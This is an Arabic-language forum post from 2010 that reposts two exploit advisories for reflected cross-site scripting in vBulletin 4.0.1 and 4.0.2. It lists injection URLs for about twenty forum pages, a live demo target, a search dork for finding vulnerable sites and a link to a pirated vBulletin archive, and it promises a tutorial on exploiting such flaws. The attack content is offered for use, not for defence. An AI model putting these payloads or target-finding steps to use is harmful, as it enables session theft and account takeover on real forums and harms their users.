الموضوع: تغرتين في منتديات النسخة vb 4.0.x
عرض مشاركة واحدة
قديم 03-24-2010, 05:18 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Zero
 
الصورة الرمزية Zero
 

 
 
إحصائية العضو








Zero غير متواجد حالياً

إرسال رسالة عبر MSN إلى Zero

 

 

إحصائية الترشيح

عدد النقاط : 10
Zero is on a distinguished road
.......... تغرتين في منتديات النسخة vb 4.0.x

بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته

اليكم التغرات

كود PHP:
===================================
vBulletin v 4.0.1 XSS Vulnerability
===================================

[+] ScriptvBulletin Version 4.0.1
[+] Vendorwww.vbulletin.com
[+] AuthorW4n73d

[~] BugCross Site Scripting (XSS)
[~] Exploithttp://[HOST]/forum/calendar.php="***************("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="***************("! XSS
!");</script>



# Inj3ct0r.com [2010-02-15] 
كود PHP:
==========================================
vBulletin  Version 4.0.2 Xss Vulnerability
==========================================

========================================================================================                  
# Title    : vBulletin  Version 4.0.2 Cross Site Scripting in URI Vulnerability      
# Author   : indoushka                                                                                                 
# Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar                                                     
# Dork     : Powered by vBulletin? Version 4.0.2                                                                                                              
# Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
# Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
# Exploit  :  
 
http://127.0.0.1/upload/calendar.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/faq.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/forum.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/usercp.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/subscription.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/showthread.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/showgroups.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/sendmessage.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/search.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/register.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/profile.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/private.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/online.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/newthread.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/misc.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/memberlist.php?=>"'>***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/member.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/inlinemod.php?acuparam=>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/index.php/>">***************(213771818860)</ScRiPt>

http://127.0.0.1/upload/forumdisplay.php?acuparam=>">***************(213771818860)</ScRiPt>



# Inj3ct0r.com [2010-02-20] 

قريبا درس استغلال تغرات Xss

jyvjdk td lkj]dhj hgksom vb 4>0>x

   

رد مع اقتباس